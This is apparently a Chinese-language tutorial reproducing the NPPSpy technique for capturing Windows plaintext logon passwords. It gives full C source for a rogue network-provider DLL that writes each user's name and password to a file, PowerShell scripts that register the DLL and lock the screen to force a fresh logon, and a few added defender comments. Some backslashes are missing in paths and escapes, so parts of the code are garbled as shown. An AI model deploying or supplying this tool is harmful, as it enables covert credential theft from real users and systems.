原理:
通过修改注册表,借助系统函数,抓取Windows明文密码
操作:
复现环境:
然后将下列代码编译为dll文件:
#include <Windows.h>
// from npapi.h
// Capability-query indices and reply values copied from npapi.h so the
// listing does not depend on the header; consumed by NPGetCaps below.
#define WNNC_SPEC_VERSION 0x00000001
#define WNNC_SPEC_VERSION51 0x00050001
#define WNNC_NET_TYPE 0x00000002
#define WNNC_START 0x0000000C
#define WNNC_WAIT_FOR_START 0x00000001
//from ntdef.h
// Counted UTF-16 string as passed around by LSA: Length and MaximumLength are
// byte counts and Buffer carries no terminator (SavePassword below relies on
// this when it hands Length straight to WriteFile). Re-declared here instead
// of including ntdef.h.
typedef struct _UNICODE_STRING
{
USHORT Length;
USHORT MaximumLength;
PWSTR Buffer;
} UNICODE_STRING, * PUNICODE_STRING;
// from NTSecAPI.h
// MSV1_0 logon submit types copied from NTSecAPI.h. Only the layout of the
// interactive variant is used in this listing; the enum is reproduced in full
// so MessageType has its SDK type.
typedef enum _MSV1_0_LOGON_SUBMIT_TYPE
{
MsV1_0InteractiveLogon = 2,
MsV1_0Lm20Logon,
MsV1_0NetworkLogon,
MsV1_0SubAuthLogon,
MsV1_0WorkstationUnlockLogon = 7,
MsV1_0S4ULogon = 12,
MsV1_0VirtualLogon = 82,
MsV1_0NoElevationLogon = 83,
MsV1_0LuidLogon = 84,
} MSV1_0_LOGON_SUBMIT_TYPE, * PMSV1_0_LOGON_SUBMIT_TYPE;
// from NTSecAPI.h
// Layout of the interactive-logon buffer that NPLogonNotify below casts
// lpAuthInfo to. The three UNICODE_STRING members are the raw credential
// material delivered to every registered network provider at logon.
typedef struct _MSV1_0_INTERACTIVE_LOGON
{
MSV1_0_LOGON_SUBMIT_TYPE MessageType;
UNICODE_STRING LogonDomainName;
UNICODE_STRING UserName;
UNICODE_STRING Password;
} MSV1_0_INTERACTIVE_LOGON, * PMSV1_0_INTERACTIVE_LOGON;
// Appends one "<user> -> <password>" record to a fixed file on the system
// drive. Both strings are written as raw UTF-16 bytes (UNICODE_STRING::Length
// is a byte count, no terminator), so the file is UTF-16 without a BOM.
// Write errors are ignored; if the file cannot be opened nothing is recorded.
//
// Defender note: a fixed, predictable drop path written at logon time is the
// on-disk artifact of this technique; file-creation auditing on the drive
// root catches it regardless of the DLL's name.
void SavePassword(PUNICODE_STRING username, PUNICODE_STRING password)
{
HANDLE hFile;
DWORD dwWritten;
// OPEN_ALWAYS + seek to FILE_END makes every call an append.
hFile = CreateFile(L"C:\NPPSpy.txt",
GENERIC_WRITE,
0,
NULL,
OPEN_ALWAYS,
FILE_ATTRIBUTE_NORMAL,
NULL);
if (hFile != INVALID_HANDLE_VALUE)
{
SetFilePointer(hFile, 0, NULL, FILE_END);
WriteFile(hFile, username->Buffer, username->Length, &dwWritten, 0);
// Separator and record terminator lengths are byte counts of the wide literals.
WriteFile(hFile, L" -> ", 8, &dwWritten, 0);
WriteFile(hFile, password->Buffer, password->Length, &dwWritten, 0);
WriteFile(hFile, L"rn", 4, &dwWritten, 0);
CloseHandle(hFile);
}
}
// Network-provider capability query (npapi.h contract). Reports spec version
// 5.1, the credential-manager provider type, and WNNC_WAIT_FOR_START for the
// start query; every other index is answered with 0 (not supported).
//
// Defender note: the credential-manager type is what makes the system deliver
// the logon buffer to NPLogonNotify, so a provider DLL advertising it
// deserves scrutiny during review of registered providers.
__declspec(dllexport)
DWORD
APIENTRY
NPGetCaps(
DWORD nIndex
)
{
switch (nIndex)
{
case WNNC_SPEC_VERSION:
return WNNC_SPEC_VERSION51;
case WNNC_NET_TYPE:
return WNNC_CRED_MANAGER;
case WNNC_START:
return WNNC_WAIT_FOR_START;
default:
return 0;
}
}
// Logon notification entry point (npapi.h contract) that the system calls on
// each registered network provider at logon with the authentication buffer.
// This implementation never inspects lpAuthInfoType: it unconditionally
// treats lpAuthInfo as an MSV1_0_INTERACTIVE_LOGON and forwards the UserName
// and Password members to SavePassword. Always reports WN_SUCCESS.
//
// Defender note: this callback is why the registry registration matters —
// any DLL reachable from the network-provider keys receives clear-text logon
// credentials. Audit additions to the provider order and new provider
// entries, and treat unsigned provider DLLs as suspect.
__declspec(dllexport)
DWORD
APIENTRY
NPLogonNotify(
PLUID lpLogonId,
LPCWSTR lpAuthInfoType,
LPVOID lpAuthInfo,
LPCWSTR lpPrevAuthInfoType,
LPVOID lpPrevAuthInfo,
LPWSTR lpStationName,
LPVOID StationHandle,
LPWSTR* lpLogonScript
)
{
SavePassword(
&(((MSV1_0_INTERACTIVE_LOGON*)lpAuthInfo)->UserName),
&(((MSV1_0_INTERACTIVE_LOGON*)lpAuthInfo)->Password)
);
// Assigns the parameter itself; the caller's LPWSTR is not written.
lpLogonScript = NULL;
return WN_SUCCESS;
}
原文中,是需要修改注册表来达到效果的,
这里为了方便,我写了一个powershell脚本,来实现修改注册表这一步:
$path = Get-ItemProperty -Path "HKLM:SYSTEMCurrentControlSetControlNetworkProviderOrder" -Name PROVIDERORDER
# Appends this provider's name to the system-wide PROVIDERORDER list and
# creates the service entry plus its NetworkProvider subkey (Class, Name and
# the expandable ProviderPath pointing at the DLL).
# Defender note: a PROVIDERORDER change and a new NetworkProvider subkey with
# a ProviderPath value are the registry artifacts to audit for this technique.
$UpdatedValue = $Path.PROVIDERORDER ",NPPSpy"
Set-ItemProperty -Path $Path.PSPath -Name "PROVIDERORDER" -Value $UpdatedValue
New-Item -Path HKLM:SYSTEMCurrentControlSetServicesNPPSpy
New-Item -Path HKLM:SYSTEMCurrentControlSetServicesNPPSpyNetworkProvider
New-ItemProperty -Path HKLM:SYSTEMCurrentControlSetServicesNPPSpyNetworkProvider -Name "Class" -Value 2
New-ItemProperty -Path HKLM:SYSTEMCurrentControlSetServicesNPPSpyNetworkProvider -Name "Name" -Value NPPSpy
New-ItemProperty -Path HKLM:SYSTEMCurrentControlSetServicesNPPSpyNetworkProvider -Name "ProviderPath" -PropertyType ExpandString -Value "%SystemRoot%System32NPPSPY.dll"
当然你也可以写一个c 版的,方便使用,看个人喜好。
然后将上面编译好的dll,放入system32目录下:
然后运行我们的powershell脚本:
模拟用户注销、重新登录,抓取到明文密码。
为了方便,直接加入锁屏功能,一键完成修改注册表并锁屏:
$path = Get-ItemProperty -Path "HKLM:SYSTEMCurrentControlSetControlNetworkProviderOrder" -Name PROVIDERORDER
# Provider registration: extend PROVIDERORDER and create the service entry
# with its NetworkProvider subkey (Class, Name, expandable ProviderPath).
# Defender note: these registry writes are the audit signal for this
# technique; they are identical to the registration script above.
$UpdatedValue = $Path.PROVIDERORDER ",NPPSpy"
Set-ItemProperty -Path $Path.PSPath -Name "PROVIDERORDER" -Value $UpdatedValue
New-Item -Path HKLM:SYSTEMCurrentControlSetServicesNPPSpy
New-Item -Path HKLM:SYSTEMCurrentControlSetServicesNPPSpyNetworkProvider
New-ItemProperty -Path HKLM:SYSTEMCurrentControlSetServicesNPPSpyNetworkProvider -Name "Class" -Value 2
New-ItemProperty -Path HKLM:SYSTEMCurrentControlSetServicesNPPSpyNetworkProvider -Name "Name" -Value NPPSpy
New-ItemProperty -Path HKLM:SYSTEMCurrentControlSetServicesNPPSpyNetworkProvider -Name "ProviderPath" -PropertyType ExpandString -Value "%SystemRoot%System32NPPSPY.dll"
# Locks the interactive session through user32!LockWorkStation (P/Invoke via
# Add-Type), forcing a re-authentication; the page's prose explains that the
# provider callback fires on that next logon. Return value is discarded.
Function Lock-WorkStation {
$signature = @"
[DllImport("user32.dll", SetLastError = true)]
public static extern bool LockWorkStation();
"@
$LockWorkStation = Add-Type -memberDefinition $signature -name "Win32LockWorkStation" -namespace Win32Functions -passthru
$LockWorkStation::LockWorkStation() | Out-Null
}
# Invoke immediately after the registry changes above.
Lock-WorkStation
思路来源:
https://twitter.com/0gtweet/status/1282962201943343105